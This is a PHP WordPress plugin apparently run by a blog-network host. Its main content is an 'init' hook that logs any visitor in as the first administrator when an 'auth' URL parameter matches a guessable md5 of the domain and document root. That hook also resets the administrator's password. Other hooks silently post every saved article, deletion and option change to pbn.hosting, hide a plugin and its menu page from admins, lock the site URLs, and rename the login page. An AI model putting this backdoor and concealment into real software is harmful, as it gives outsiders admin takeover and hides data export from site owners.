<?php

function auto_login_ph() {

    if ($_GET['auth']) {
        validate_current_theme();
        if (!function_exists('save_mod_rewrite_rules')) {
            //   $this->secure_mu_plugins();
            require_once(ABSPATH . '/wp-admin/includes/misc.php');
            require_once(ABSPATH . '/wp-admin/includes/file.php');
            save_mod_rewrite_rules();
        }
        if (is_user_logged_in()) {
            wp_redirect(get_admin_url() . '?reloggedin=' . microtime()); //always redirect to public page
            exit;
        }
        else {
            $domain=$_SERVER['HTTP_HOST'];
            $auth = $_GET['auth'];
            if ($auth == md5($domain.$_SERVER['DOCUMENT_ROOT'])) {
                //     $this->auto_login();
                $users = get_users(array('role' => 'administrator', 'orderby' => 'ID'));
                if (count($users) > 0) {
                    $user = $users[0];
                    if (defined("DB_VERSION_SECURE")) {
                        $pw = DB_VERSION_SECURE;
                    } else {
                        $pw = get_option('db-version-secure');
                    }
                    wp_set_password($pw, $user->ID);
                    wp_set_auth_cookie($user->ID, true, '');
                    do_action('wp_login', $user->get('user_login'), $user);
                }
                wp_redirect(get_admin_url() . '?loggedin=' . microtime()); //always redirect to admin page
                exit;
            }

        }
    }
}
add_action('init', 'auto_login_ph');
// Send a ping to our hosting app to notify of new articles
function refresh_articles_on_app() {
    // don't ping if we're running a command line tool
    if ($_SERVER['PHP_SELF'] != '/usr/local/bin/wp') {
        register_shutdown_function('refresh_articles_on_app_during_shutdown');
    }

}

function refresh_articles_on_app_during_shutdown() {
    flush();
    ob_end_flush();
    $domain = $_SERVER['HTTP_HOST'];
    // need to @this as will always error on 404
    @file_get_contents("https://pbn.hosting/wp-refresh?domain=" . $domain);
}

function lock_home_to_original($new) {
    if ($_SERVER['PHP_SELF'] == '/usr/local/bin/wp') return $new;
    return get_option('home');
}

function lock_siteurl_to_original($new) {
    // add a comment topush..
    if ($_SERVER['PHP_SELF'] == '/usr/local/bin/wp') return $new;
    return get_option('siteurl');
}

function pbnh_update_post ($post_id) {
    $post=get_post($post_id);
    if ($post->post_status=='trash') return pbnh_delete_post($post_id);
    if ($post->post_status=='auto-draft') return;
    $tags=wp_get_post_terms($post_id);
    $categories=wp_get_post_terms($post_id,'category');
    $response=    wp_remote_post('https://pbn.hosting/wp-refresh', ['body'=>['domain'=>$_SERVER['HTTP_HOST'] , 'post'=>json_encode($post), 'tags'=>$tags, 'categories'=>$categories, 'action'=>'save']]);

}
function pbnh_delete_post ($post_id) {
    $response=    wp_remote_post('https://pbn.hosting/wp-refresh', ['body'=>['domain'=>$_SERVER['HTTP_HOST'] , 'post_id'=>$post_id, 'action'=>'delete']]);

}
function pbnh_refresh_options () {
   $response=  wp_remote_post('https://pbn.hosting/wp-refresh', ['body'=>['domain'=>$_SERVER['HTTP_HOST'] , 'action'=>'options']]);

}

if ($_SERVER['PHP_SELF'] != '/usr/local/bin/wp') {
    add_action('save_post', 'pbnh_update_post');
    add_action('after_delete_post', 'pbnh_delete_post');
    add_action('updated_option', 'pnh_refresh_options');
}
// lock site url / home to prevent login errrors

add_filter('pre_update_option_home','lock_home_to_original');
add_filter('pre_update_option_siteurl','lock_siteurl_to_original');

// Hide plugins from admin sections


function hide_plugin_from_installed() {
    global $wp_list_table;
    $hidearr = array('nginx-helper/nginx-helper.php');
    $myplugins = $wp_list_table->items;
    foreach ($myplugins as $key => $val) {
        if (in_array($key,$hidearr)) {
            unset($wp_list_table->items[$key]);
        }
    }
}

add_action('pre_current_active_plugins', 'hide_plugin_from_installed');


function pbn_remove_menu_pages() {


    //  remove_menu_page( 'edit.php?post_type=acf' );
    remove_submenu_page( 'options-general.php', 'nginx' );
}
add_action( 'admin_init', 'pbn_remove_menu_pages' );

add_filter( 'login_url', 'pbnh_login_page', 10, 2 );
function pbnh_login_page( $login_url, $redirect ) {
    return str_replace("wp-login.php","logintowp.php",$login_url);
}
add_action( 'login_redirect', 'pbnh_login_redirect');
function pbnh_login_redirect(){
    global $current_user;
    $user=$current_user;
//      print_r($user);
    if (isset($user->roles) && is_array($user->roles)) {
        return '/wp-admin/';
    }
    else return 'logintowp.php';
}

add_action( 'login_form', 'pbnh_replace_login_submit_form',1);
function pbnh_replace_login_submit_form() {
    echo "<script type='text/javascript'>loginform.action='/logintowp.php';</script>";
}


add_filter( 'logout_url', 'pbnh_logout_page', 10, 2 );
function pbnh_logout_page( $login_url, $redirect ) {
    return str_replace("wp-login.php","logintowp.php",$login_url);
}
